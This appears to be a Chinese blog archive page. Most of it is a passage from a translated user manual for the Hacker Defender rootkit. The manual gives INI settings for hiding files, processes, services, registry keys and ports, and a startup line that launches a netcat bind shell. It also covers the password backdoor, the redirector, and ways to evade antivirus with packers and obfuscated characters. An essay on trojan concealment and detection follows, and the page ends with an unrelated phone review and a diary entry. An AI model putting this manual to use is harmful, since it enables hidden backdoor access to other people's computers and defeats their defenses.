参数 -:refresh and -:uninstall 来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名,就能够改变它的设置或者进行移除工作。


=====[ 4. Ini文件 ]============================================

ini文件必须包含了9个部分: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports]和[Settings]。


在 [Hidden Table], [Root Processes], [Hidden Services]和[Hidden RegValues] 中能够使用*代替后面的字符,星号仅仅使用于字符的后面,任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。


例如:

[Hidden Table]

hxdef*


将开始隐藏所有在Hidden Table中以”hxdef”开头的文件、文件夹和系统进程。


在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件,INI文件,你的后门文件和驱动文件被包含在列表中。

在程序列表中的主进程对感染具有免淤能力,你只能利用这些主程序才能看见隐藏的文件,文件夹和程序。所以,主进程是为rootkit管理员所使用的。

服务和驱动所组成的Hidden Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100,rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。


Hidden RegKeys中列出的注册表键值将会被隐藏,Rootkit在注册表中有四个键值:默认的是HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 如果你要重新命名服务名或者驱动名,你需要在列表中做相应的改变。

开始2个键值是和你的服务据用相同名字的,接下来的键值是LEGACY_名字。例如,如果你改变你的服务名称为BoomThisIsMySvc ,那么在注册表中,应该是这样表示的,LEGACY_BOOMTHISISMYSVC。


在Hidden RegValues列出的注册表的值将会被隐藏。


Startup Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以?分开。不要使用”字符,程序将会在用户登陆以后终止,在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。

%cmd%标准系统的shell和路径

%cmddir%标准系统的shell文件夹

%sysdir%     – 系统文件夹

              (e.g. C:\winnt\system32\)

%windir%     – 标准系统文件夹

              (e.g. C:\winnt\)

%tmpdir%     – 临时文件夹

              (e.g. C:\winnt\temp\)


例如:

1)

[Startup Run]

c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

nc-shell将会在rootkit运行以后监听100端口


2)

[Startup Run]

%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt

将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。

(%TIME%仅仅运行于Windows2000以上的操作系统。)


Free Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM,其中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。


例如:

[Free Space]

C:123456789

这将在C盘增加大约123M的磁盘空间。


Hidden Ports中列出的是你需要隐藏程序的端口,比如使用OpPorts, FPort, Active Ports, Tcp View等的程序,它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3 ,第2行的格式是UDP:udpport1,udpport2,udpport3 …


例如:

1)

[Hidden Ports]

TCP:8080,456


这将隐藏2个TCP端口:8080和456

2)

[Hidden Ports]

TCP:8001

UDP:12345

这将隐藏2个端口:TCP的8001和UDP的12345。


3)

[Hidden Ports]

TCP:

UDP:53,54,55,56,800

隐藏5个端口,都为UDP端口:53,54,55,56,800。


Settings包含了8个值:Password, BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName, ServiceDescription, DriverName 和 DriverFileName。

名。

16位字符的Password被用于后门链接和转向,密码能根据短一些,余下的用空格代替。

BackdoorShell是复制于系统的SHELL文件,它被后门创建于一个临时的目录下。

FileMappingName,当钩子进程被存储时,用于共享内存。

ServiceName是rootkit服务

ServiceDisplayName为rootkit显示的服务

ServiceDescription位rootkit的服务描述

DriverName以hxdef驱动命名

DriverFileName以hxdef驱动文件命名


例如;


[Settings]

Password=hxdef-rulez

BackdoorShell=hxdef?.exe

FileMappingName=_.-=[Hacker Defender]=-._

ServiceName=HackerDefender100

ServiceDisplayName=HXD Service 100

ServiceDescription=powerful NT rootkit

DriverName=HackerDefenderDrv100

DriverFileName=hxdefdrv.sys

   

这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为hxdef?.exe到临时目录。共享内存将变为”_.-=[Hacker Defender]=-._“,服务名为”HackerDefender100″,它显示的名称为”HXD Service 100″,它的描述为”poweful NT rootkit”,驱动名为”HackerDefenderDrv100″,驱动将被存储于一个叫做”hxdefdrv.sys”的文件中。


扩展字符|, <, >, :, \, / 和 “在所有的行中都会被忽略,除了[Startup Run], [Free Space] 和 [Hidden Ports] 项目和在 [Settings] 中first = character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。

例如:

Example:

[H<<>a/"ble]

>h”xdef”*


和下面的是一样的。

[Hidden Table]

hxdef*

更多的例如可以参照hxdef100.ini 和hxdef100.2.ini文件。

所有的在ini文件中的字符串除了那些在Settings 和 Startup Run中的,都是无效的。




=====[ 5. Backdoor ]=========================================

Rootkit程序 Hook了一些API的功能,连接接收一些来自网络的数据包。如果接收的数据等于256个字节,密码服务被确认,复制的SHELL被临时创建,这种情况建立以后,下一次的数据接收被重定向到这个SHELL上。

因为rootkit程序 Hook了系统中所有进程,所有在服务器上的TCP端口都将变为后门。例如,如果目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务,像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它,并且它能轻易的穿过_blank”>防火墙


在测试发现IIS服务过程中,HTTP服务不能记录任何的连接日记,FTP和SMTP服务器仅仅能记录结束的断开连接。所以,如果你运行hxdef在有IIS Web服务服务器上面,HTTP端口跟你是连接机器使用的后门的最好端口。

如果你想连接后门的话,你将不得不使用使用一些特别的客户端,程序bdcli100.exe就是被用于如此的。


用法:bdcli100.exe host port password

例如:

>bdcli100.exe www.windowsserver.com 80 hxdef-rulez

连接服务www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他老的版本。


=====[ 5.1 Redirector ]==========================================


Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包,这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。


Redirectors的设置保存在与EXE文件同名的INI文件中(所以默认的是rdrbs100.ini)。如果这个文件不存在,那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。


当ROOTKIT被安装时,如果我们需要使用服务器上面的redirectors功能,我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制,而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors base有19条命令,他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors base启动时,startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。


Redirector区分于2种连接类型(HTTP和其他)。如果连接是其他类型的,数据包将不会被改变。如果是HTTP类型,在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。

Redirector仅仅适用于NT结构,只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行,没有数据输出,没有图标,仅仅执行startup-list中的命令。


例子:

1)得到端口映射信息

>MPINFO

    No mapped ports in the list.


2)增加MPINFO命令到startup-list并且得到startup-list中的命令。

    >SUADD MPINFO

    >sulist

0)     MPINFO


3)使用HELP命令。


    >HELP

    Type HELP COMMAND for command details.

    Valid commands are:

    HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,


DEL,

    DETAIL,     SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST

    >HELP ADD

    Create mapped port. You have to specify domain when using HTTP


type.

    usage: ADD



    SERVER> [TYPE] [DOMAIN]

    >HELP EXIT

    Kill this application. Use DIS flag to discard unsaved data.

    usage: EXIT [DIS]


4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安装在服务器200.100.2.36的80端口上,目标服务器是www.google.com80端口。,rootkit的密码是bIgpWd,连接类型HTTP,目标主机(www.google.com)我们知道它的IP地址是216.239.53.100。

>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com


ADD命令可以不加任何参数的运行,在这个例子中我们要求每一个参数都要分开



5)现在我们再使用MPINFO检查一下映射端口

>MPINFO

    There are 1 mapped ports in the list. Currently 0 of them


open.




6)列举端口映射表:

>LIST

    000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP


7)一个端口映射的详细描述:

>DETAIL 0

    Listening on port: 100

    Mapping server address: 200.100.2.36

    Mapping server port: 80

    Target server address: 216.239.53.100

    Target server port: 80

    Password: bIgpWd

    Port type: HTTP

    Domain name for HTTP Host: www.google.com

    Current state: CLOSED


8)在没有密码的情况下,我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装(但是如果我们能确认它这样做就不再需要)

    >TEST 0

    Testing 0) 200.100.2.36:80:bIgpWd – OK


如果测试失败则显示:

    Testing 0) 200.100.2.36:80:bIgpWd – FAILED


9)在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它,当端口开放时,我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口,这个过程可能需要一段的时间。

    >OPEN 0

    Port number 0 opened.

    >CLOSE 0

    Port number 0 closed.


或者


    >OPEN ALL

    Port number 0 opened.

10)要保存当前的设置和列表我们可以使用SAVE命令,将保存所有的设置到ini文件中。(保存也会通过命令EXIT执行,而不需要DIS标志)

   

    >SAVE

    Saved successfully.


打开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址http://localhost:100/,如果没有什么问题的话,你会看见打开的是www.google.com的主页。


第一个数据包跟你会延迟5秒钟左右,但是其他的限制仅仅取决于服务器的速度,根据这个版本的转向技术,你联网的速度大约在256K左右。


=====[ 6. 技术发行]========================================

这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读。


=====[ 6.1 版本 ]===========================================


=====[ 6.3 已知的BUGS]=====================================

在这个版本有一个已知的bugs。

1)     当你在控制台使用右键或者使用控制台菜单复制大量的数据到剪切板的时候,后面客户端可能会崩溃。如果程序在运行过程中如上所说,你仍然能使用Ctrl+Ins, Shift+Ins从剪切板中粘贴数据。


如果你发现了BUGS请报告给公共留言簿(如果你是测试人员请发送到测试人员留言簿)或者E-mail到rootkit@host.sk。但是必须保证你已经阅读了使用说明FAQ部分,todo列表和留言簿,并且你在写之前还没有任何其他的相关资料。


=====[ 7. Faq ]===================================================

因为在留言簿上出现了大量的简单问题,使我意识到写这个FAQ部分在这个使用说明中。在你问任何问题之前请先阅读这个使用说明2次并且特别注意这个部分。然后查看留言簿中以前的帖子,如果你发现你还使不能找到解决的答案,请把你的问题发到留言簿中。


这些问题是

1)     我下载了hxdef,运行了但不能删除它,如果我不能看见它的进程、服务和文件,我怎么删除它?


A:如果你保留了最初的设置你可以在SHELL中停止服务

    >net stop HackerDefender100

hxdef将会停止服务完全的卸载。这和-:uninstall是一样的,但是你不需要知道hxdef在什么地方。如果你在ini文件设置中更改了服务名,在CMD下输入:

    >net stop ServiceName

其中ServiceName 是你在ini文件进行设置的服务名。

如果你忘记了服务名,你可以使用系统启动光盘重新启动到DOS环境,找出hxdef的ini文件,打开并找出它的服务名。


2)     一些人黑客我的机器,运行了hxdef我不能删除它。我怎么才能卸载它和所有安装在我电脑上的后门程序?


A:唯一能做的就是重新安装你的操作系统。但是如果你能和上面的情况一样找出ini文件,根据ini文件卸载hxdef找出所有在Hidden Table中列出的文件,确认这些文件并且完全删除它们。


3)     这个程序能被杀毒软件查杀吗?如果是,怎么才能让它不被查杀?


A:是的,不仅仅exe文件会被查杀,一些杀毒软件甚至能查杀ini文件和驱动文件。第二个问题的答案就是,你能很轻松的躲避查杀。在hxdef主页你可以发现一个工具叫做Morphine,如果你在hxdef的exe文件上使用了Morphine,你会得到一个新的exe文件,这个文件不会被普通的杀毒软件查杀。Ini文件也能设计为躲避杀毒软件,你可以增加一些扩展字符以抵抗杀毒系统。详细的可以看4.ini文件部分。也可以看包含的ini文件,这2个样本是一样的,但是第一个使用了扩展字符让它能够躲过杀毒软件。也许在使用Morphine之前最好的方法是使用UPX,UPX将会减少hedef的exe文件大小,Morphine将会遮蔽杀毒软件,关于更多的可以看Morphine的使用说明。


4)     当服务器开放135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP端口的时候,为什么我不能通过这些端口连接我的后门?


A:这个问题在第五部分,后门章节被提及到。后门需要服务器接收缓冲大于或者等于256个字节,统一,系统的端口可能不工作。如果你遇到了这样的问题,你可以简单的使用NC监听一个你自己的端口,你需要增加这个NC端口到ini文件的Hidden Ports。




5)     当文件在磁盘上是可见的时候,还有什么办法隐藏进程吗?


A:不能,你也不能隐藏在磁盘上文件的进程,当它在认为管理器中是可见的时候



6)     怎么样隐藏svchost.exe和其他我能够在任务管理器上看见的进程?


A:这真的是一个坏的注意,如果你隐藏了系统必需的进程,你的WINDOWS将会马上崩溃。拥有hxdef你不需要命名你那些恶毒的问题为svchost.exe, lsass.exe等。你可以将它命名为任何名字然后在Hidden Table隐藏它。


7)     当我使用DameWare时我能看见所有本应该被隐藏的服务和其他,这是一个bug吗?


A:不是。DameWare或者其他个人使用的远程sessions (或者 netbios)能够看见服务,是因为这个功能还没有实现。它是介于bug和未开发的一个大问题。看网站TODO列表,这些功能还未开发。


8)     但是所有经过netbios的人都能看见我隐藏的文件,我该怎么做?


A:把你的文件深深的放在系统文件夹里面或者不要共享文件夹。


9)     后门客户端不工作。每次看上去好像是OK的,但是连接上以后我不能输入任何东西,整个控制台也是黑色的。我该怎么做?


A:你可能使用了一个错误的端口连接。Hxdef能自动的检测错误的端口并且中断你的连接,但是有时候也许不能检测到你使用错误的端口。所以,请使用一个不同的端口。


10)     什么时候我们能得到新的版本?


A:开发者都是在业余时间开发代码。他们没有从这个上面得到任何的钱而且也不会从这个上面得到钱。现在只有2位代码开发者我们认为这已经足够了。这就意味这我们不会象微软那样快的发布程序,你最好的是等,不要问我们什么时候将会公布新的版本。不像微软,我们的产品都是免费的并且拥有良好的测试人员,我们测试这个程序很多次,所以发布的都是非常的稳定的。


11)     Net.exe命令不能停止隐藏的服务,这是一个bug吗?


A:不是,这不是一个bug,而是它的特征。如果你隐藏了它,只有rootkit的管理员在知道服务名的情况下才能停止它。所以不要恐惧这种方式能发现你。


12)     有什么方法找到rootkit吗?


A:是的。有很多种方式能找出所有的rootkit,这个也不例外。任何的rootkit都能被检测。唯一的问题是在于它的难度和别人用它来做什么。


13)     既然找出hxdef很难,有人能写出一个程序吗?


A:很容易就能发现它,但是我不知道有什么特别的软件能马上告诉你你的机器上面安装有hxdef。


14)     我怎么样才能找出它?


A:我不会告诉你的。呵呵!


15)     版本的数量从0开始是否意味这它没有固定的版本?


A:不。它表示一些小的未开发的东西将会在下次开发被完善。


16)     你什么时候公布源代码?我想阅读1.0.0版本的代码,什么时候公布呢?


A:我真的不知道。在发布1.0.0版本以后有很多的事情需要我去开发。它可能需要6个月或者更长的时间。


17)     我想成为一个测试人员,我该怎么做?


A:你可以写信告诉我你该怎么做,告诉我你作为一个测试人员的工作能力和经验。但是成为一个新的测试人员的机会是相当小的。现在我们有足够的测试人员他们都做得很好,不需要增加人员。


18)     使用hxdef符合法律吗?


A:当然是。但是hxdef经常被用于非法行为。


19)     能否将老的hxdef升级到限制的版本?有办法不需要重新启动机器吗?


A:不可能不需要重启你的电脑,但是你可以手工卸载老的版本进行升级,重启你的电脑进行安装新的版本。


20)     这个版本的hxdef能否升级为以后的新版本?不需要重启电脑可以吗?


A:是的,你可以使用-:uninstall完全移除hxdef的这个版本不需要重启电脑,在安装新的版本。


21)     使用-:uninstall好,还是使用net stop ServiceName好?


A:最好的方式是使用-:uninstall进行卸载,如果有可能的话,不过使用net stop也能得到一样的效果。


22)     我真的很喜欢这个程序,我可以支持你的工作并给你一点捐助吗?


A:我们不需要。但是我们希望你能把钱捐献给你的国家的任何慈善机构,写份MAIL告诉我们关于这件事情。


23)     在哪里可以干部隐藏C:\temp而不是隐藏C:\winnt\temp?


A:不能。创建你自己的文件夹并把名字放在Hidden Table下面。


24)     我在ini文件中找到的密码是明文的,是这样的吗?


A:你可能认为这是一个非常不安全的方法存储密码,但是如果你隐藏你的ini文件没有能够找到,这就是安全的。这个很容易在任何时间进行改变,你可以使用-:refresh非常轻松的改变你的密码


25)     如果我在Hidden Table 隐藏一个监听于某一端口的进程,这个端口也会自动隐藏吗?还是需要在Hidden Ports设置?


A:只有在Hidden Ports列表种的端口才能被隐藏。所以,请把它的端口放在Hidden Ports中。


=====[ 8. 文件 ]===================================================

defender v1.0.0包含下列的原是档案文件:

hxdef100.exe     70 144 b     – Hacker defender v1.0.0程序

hxdef100.ini     3 872 b     -默认的ini设置文件

hxdef100.2.ini     3 695 b     -默认的ini设置文件, 第2类

bdcli100.exe     26 624 b     – 后门客户端

rdrbs100.exe     49 152 b     – redirectors base

readmecz.txt     34 654 b     – 捷克语版说明文件

readmeen.txt     35 956 b     – 英语说明文件

readmefr.txt     38 029 b     – 法语说明文件

src.zip         91 936 b     – 源代码

readmezh.txt     38 029 b     – 中文说明文件


=====[END]====================================================

一、首先从rootkit说起


rootkit是什么?是指通过入侵计算机系统,并获得管理员访问权限的一类软件。rootkit软件能够在系统最底层上控制计算机,就连微软安全部门都感到头痛。它能够隐藏行踪,使计算机用户无法发现它或发现它完成某些任务。与大多数的计算工具一样,R ootkit从本质上说并非一种恶意技术,但木马作者可以使用这一技术控制用户的计算机,并隐藏他们自己的“作品”,因此被黑客们大肆利用。现在,rootkit已经成了采用此技术的特洛伊木马的代名词。


有人把常见的木马分为3个级别:


1、应用级:如WinShell、Radmin、冰河等,它们基本没有采取别的方法来隐藏自己,只是一个普通的能够实现远程控制的应用程序而已;


2、系统级:多少采用了一些下隐藏行踪的编程技术,如Bingle、Portless、ZXshell,常见的比如Hxdef(Hacker defender)、灰鸽子等;


3、内核级:木马程序主要部分工作在系统内核,采用的隐身方法有象病毒一样感染系统文件,修改系统内核等,因此有很强的隐蔽性和杀伤力。如hacker’s door(黑客之门)等。


应用级的木马只是在后台运行,通过检查被感染系统进程,就能够轻易地发现它们。但是,系统级和内核级的rootkit木马越来越常见,其隐身能力取得了飞速的发展。一些新的rootkit能够截获传递给内核的系统调用,过滤由rootkit生成的查询,其 结果是木马正在运行的典型特征,例如文件名、进程、注册表,都无法被系统管理员或扫描工具所发现。


以下是网上一段木马性能优劣与否的评价摘录:


1、一个合格的木马至少应该做到不能有陌生进程存在于任务管理器里,给后门进程起一个看起来像系统进程的名字只是掩耳盗铃;
2、不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新增服务,当然更不能直接写开始菜单的启动项;
3、不能如同无视管理员或者防火墙一般明目张胆地打开陌生端口;像Bits.dll那样等待连接时无端口,连接时开端口的程序,在端口检查时只有30%的几率能逃脱。
4、另外,后门最好能隐藏自己生成的文件,或者避免感染一些管理员经常检查完整性的系统文件。
前三点没有做到的后门程序不是一个优秀的木马程序,当然在使用的时候也就没有稳定性、保密性可言了。


二、木马攻防战


第一回合:隐身:拦截系统查询


除了喜欢“裸奔”的人之外,几乎所有的PC上都安装了杀毒软件。在各种各样的杀毒软件的围剿下,真正的、严格意义上的计算机病毒在我们的计算机世界里越来越难得一见了。随着internet的普及,通过网络传播的木马、蠕虫却四处为虐。


就象前文对木马分级别的观点一样,早期的木马只是一个应用程序,具备了普通程序的特征:文件名、进程调用。人们对付木马的常规手段无非是检查是否有异常进程、注册表启动项目、NT服务等。


后来,随着木马隐藏技术的发展,木马开始拦截传递给系统内核的查询,达到隐身的目的,导致普通基于Windows API的进程查看工具(如Windows的任务管理器)和NT服务查看工具(如Windows的services.msc),无法发现木马的进程和服务,木马文件也在硬盘上隐身,常规检查手段失效。


于是,一些新的基于系统内核的进程、NT服务和注册表查看工具应运而生,例如RKDETECTOR、国产的冰刃(IceSword)、Kernel PS(knlps)、Kernel SC(knlsc)、SPW、Fport、Llister等。系统级木马的行踪在上述工具下,暴露无遗。第一回合,木马拦截系统查询的隐身技术被攻破,木马败下阵来。


第二回合:寄生和感染


新一代的木马采取了更为隐蔽的手段。第一种方法,利用线程嵌入DLL到系统进程,木马本身无进程。在木马线程嵌入加载后,立即解除DLL映射,同时删除DLL文件、嵌入工具的NT服务或注册表启动项,关机时恢复。这类木马启动后无文件、无进程、无DLL、 无启动项、无NT服务,也不改写系统文件,检查进程及加载的DLL线程、NT服务和注册表都无法发现木马的行踪。不过假如Windows突然崩溃重启、或断电,这类木马就死跷跷了。有的木马在安全模式下能无法加载,可在安全模式下查杀,但有的在安全模式下 也能加载,那我们只好回到DOS下或用双Windows的方法来检查了。


第二种方法,结合病毒技术,采取感染系统文件的方法,这已经和病毒越来越象了。传统病毒能做的只是传染、删除文件、格式化硬盘、中止某些进程等,几K大小的代码足以完成。而木马是网络程序,功能复杂,体积也庞大得多,难以写入或附加到系统文件中,所谓感染 只是修改文件的DLL引入链表等内部结构,使其能自动加载木马DLL文件,被感染文件的大小、日期和原有功能不会改变。然后,把木马DLL文件复制到指定的文件夹内,以便被加载,加载后同样可以用第一种方法中解除DLL映射的方法让加载的DLL线程隐身, 而且,此类木马还能轻而易举地解除Widnows的系统文件保护功能。


对于第二回合的病毒,内核级的进程、NT服务和注册表查看工具也无从查找,木马查看工具败下阵来。用此类工具手工检测,基本上都会无功而返,那么只有依靠杀毒软件和反木马软件了。


第三回合:和杀毒工具的较量


任何软件都有代码,杀毒软件通常都是把病毒和木马的固定特征代码写入病毒库,以作为判断病毒和木马的依据。早在几年以前,就出现了所谓的“病毒生产机”类的超级病毒,感染系统后,用重新编译、加壳等方法,自动繁衍出成百上千个特征代码不同的变形后代,为此 ,杀毒软件开发出“启发式”扫描未知病毒的方法来应对,即在内存中模拟一个环境,让未知病毒在虚拟环境中发作,从而发现未知病毒。但木马毕竟不是病毒,它和病毒最大的区别就再于是否会通过繁衍的方法来传染其它文件和其它计算机,对未知木马,启发式扫描作用 不大。杀毒软件扫描后建立文件特征数据库的方法,对文件感染型木马有效,但对无文件、无进程、无DLL、无启动项的木马,杀毒软件试着只好去内存地址空间中查找木马的行踪了。


第三回合,未分胜负,但杀毒软件总是比木马慢半拍,等新木马传播开来了,杀毒软件才把其特征码加入到病毒库中。那时候,说不定你的电脑早成了黑客的乐园了。

2006年05月16日

一个月前,我得到了MVP赠送的智能手机I-MATE JASJAR,在国内叫多普达900。一个月过去了,我的感受如何呢?下面我从几个方面来说说这款手机的特点和不足。也算是作为得到这个手机的必要反馈吧。


外观


首先说说外观,这个手机的第一印象就是“大”,应该说是非常的大(对于手机来说),大到基本上你很难将其随意的放入口袋,而只能将其提在手上或装入包中使用。不仅大,该手机还很重,不带电池有近300克重,比起越来越轻薄的手机来说,无疑这是一个另类的产品。


但是,如果把它的强大功能和外观做一对照的话,那就不显得大了,因为它本来就不是一个手机,而是一个不折不扣的微型电脑,带有硬键盘和可旋转的屏幕(有VGA的分辨率),所以从这一点来看,再怎么说也不能算大哦(比笔记本可小很多了,呵呵)。


我拿到的上I-MATE的产品,整个外观相当的精致,比起国内的水货质量要好很多,尤其是内带的原版的英文系统(可惜是英文的)相当的稳定,基本不会意外的死机或其他(除非开启过多程序),比起网络可以找到的简体中文版稳定很多,所以我一直没更换。


性能


该手机的性能可说是相当的强大,采用了Intel Bulverde, 520 MHz 的处理器,搭配128MB的ROM和64MB的运行RAM(但由于WM5本身很大,所以实际留给用户可以使用的内存只有约43MB),配合3.6英寸的640×480像素防反光TFT彩屏(65536色)并带有硬件的键盘,这样的配置在PPC里无疑是强大的。


该机还具有WI-FI功能、蓝牙功能以及红外,适用于GSM/GPRS以及WCDMA(3G)网络,可以在中国移动和中国联通(GSM)网络中正常使用。


机器内带双摄像头,其中主摄像头为130万的CMOS的,还可以支持扩展SD卡。这使得系统有很强的扩展能力,当然,为了使系统更好的工作,强大的电源是必不可少的,该机使用了高达1620毫安的电池,即使如此,在如此强大功能下仍显得力不从心。


使用


说了这么多,还是看看实际的使用吧,装上中国移动的SIM卡,安装好电池,开机,一切很正常,在等待一段时间后,系统顺利启动。尝试做了一些基本的操作,感觉速度还可以,并不象网上说的那么慢(不过比起手机确实要慢一些的,这对初次使用PPC的需要适应一下)。由于这是I-MATE的定制版本,其中已经预安装了很多的程序,如ETRUST及PDF查看器等。运行起来和PC机程序没什么区别,由于是定制版,所以系统很稳定,在我使用的一个多月里,重来没有做过硬启动。不过由于PPC程序关闭后不会释放所有的内存,所以需要经常软启动以释放资源,这看来是智能手机很难解决的问题。


在语音通信方面,总的来说还是不错的,但由于没有双屏幕,所以在接电话前先要打开盖子看看来电者,然后再盖上盖子接电话,实在太不方便了,当然如果你足够有钱,可以购买带来电显示的蓝牙耳机(不便宜哦,至少1000元),这样也许可以缓解这一问题。另一个问题是在来电时,接听和拒绝按钮竟然不亮,而这两个按钮的样子很象,图标也类似,很容易在忙乱中弄错。而使用耳机上的按钮也略显不便。此外拨电话号码也很不方便,很难单手操作,好在系统提供了声控拨号功能,尝试了一下,确实很不错,但对着耳机自言自语,会被人怀疑为从精神病走失的人哦,呵呵。。另外顺便说一下,原带的有线耳机用起来很不好,不仅有一堆的线,而且按扭经常要按好几下才有反应,后来换了蓝牙耳机才体现了语言拨号的强大功能。


该机器支持3G的视频通话,可惜由于国内无此网络,无法实验,但从一些国外朋友使用的情况来看,效果是非常不错的。


在短消息方面,该机支持SMS(文字)、MMS(彩信)以及和Exchange或其他邮件服务器(支持POP3和IMAP4两类)的同步,用它配置了EAS和我公司的Exchange同步,效果很好,就是GPRS实在太慢,在同步大量邮件时显然是不合适的。在打上AKU2补丁后,还可以实现自定义文件夹的同步等新功能。其他信息服务也运行正常,尤其是MMS,在大屏幕的支持下,色彩艳丽,非常的不错。有了它,我就可以不用整天带着笔记本查看邮件了,呵呵。只是用键盘收发短消息不是很方便,尤其是手拿物品时。


在通讯方面,该机支持几乎所有的网络,包括GPRS、WI-FI、红外等,可以方便的随时随地的使用网络,不过有点遗憾的是,由于大多数的网站都是为PC机设计的,在PPC上访问时会出现需要频繁拖拉或字体重叠现象。看来国内的网站还要在这方面做很多的改进。


多媒体功能,本机具有强大的多媒体功能,自带的WMP 10可以很好的播放和同步各种多媒体文件,如WMV、WMA等,对于RM格式的文件,可以用RealOne Player来播放(遗憾的是在PPC上播放的RM格式文件的流率要比较低,且不太支持RMVB格式),对于其他一些格式的文件,可以用TCPMP来播放,这是一款非常强大的播放软件,能播放除RM格式外的几乎所有文件。


其他方面,在其他方面,JASJAR做的也不错,硬件的键盘可以有效的加快输入速度,不过不便于单手操作。内带的移动版MSN可以很好的解决即时消息问题,遗憾的是登录速度太慢,且显示不太合理,操作较复杂。由于PPC使用的和PC几乎一样的系统,所以PPC上可以安装很多的软件,我安装了几款不错的游戏,如AGE,得益于JASJAR的出色的屏幕,这些游戏的表现相当的好。


内带的主摄像头具有130万的像素,可以拍摄不错的照片,还可以加框或拍摄成联系人图片(可以放在联系人里,类似来电大头贴),并可以做无限时间的录象和录音。配合大容量的扩展存储卡,可以看电影、听音乐、上网以及游戏。


系统还带了OFFICE MOBILE套件,可以兼容OFFICE组件,实现在PPC上对OFFICE文件进行编辑和使用。从此我不用带着笔记本去客户那了,也不用带着笔记本去开会了,呵呵。。


缺点


几个显著的缺点是:


1、体积太大,重量大,耗电高


2、单手操作性差,不便于携带


3、中文支持差,原配机器不支持中文,再安装了中文外挂系统后显示和识别中文仍很不理想


4、内存泄漏情况严重


展望


总接来说,I-MATE JASJAR还是一款不错的PPC手机,功能强大。由于目前PPC的功能越来越强大,导致耗电大大增加,由于电池体积的增加和硬件键盘的加入,势必导致机器体积和重量增加,这就不便于携带了,所以我想能不能将PPC做成两个,一个是主机,可以实现更多的更复杂的功能,体积可以大一些,另一个则是能完成基本通话功能的子机,这样是不是会解决这个矛盾呢。


随着PPC的发展,电池电力是制约PPC发展的重要因素了。看来设计高容量的电池也是必不可少的工作。


在本文成稿之时,我正在辽河实施项目。从微软内部已经得到消息,WM 6.0已经向欧美的FTE提供下载了,可惜我不是被允许下载的群体,呵呵,,不过可以相信的是在WM 6里一定会有更多的适合移动设备使用的新功能,在不久的将来,我们将能看到一群拿着PPC办公的人,能在电脑上完成的基本工作都将有望在PPC上完成,到时候我们将说这是一个能打电话的电脑,而不再是一个具有电脑功能的电话了。那将是我们的数码时代的新革命的开始,我们和微软一起期待着。


感谢微软给我这样一次体验先进移动设备的机会,短短的一个月时间,JASJAR已经给我的生活带来了很大的转变,相信它也会给你的生活带来变化。


 


 


 


 



 

2006年05月15日

昨天(13日)下午加了半天班,到晚上6点多才回来,晚饭吃的是焖锅,还不错,就是太多了。晚上还是在住的地方住的,遇到了同住的小MM,她是在中国人民保险公司做车辆保险的,我们随便聊了几句,就各自休息了。计划明天把房子的事情处理好。


14日是在北京的最后一天,一大早就被装修的声音吵醒(这个小区很多家仍在装修),只好起来了,中午的时候,江湖过来了(本来是昨天来的),我们聊了一会,他也说我的房子不好,比较贵,而且环境也不好。我于是决定退房了。


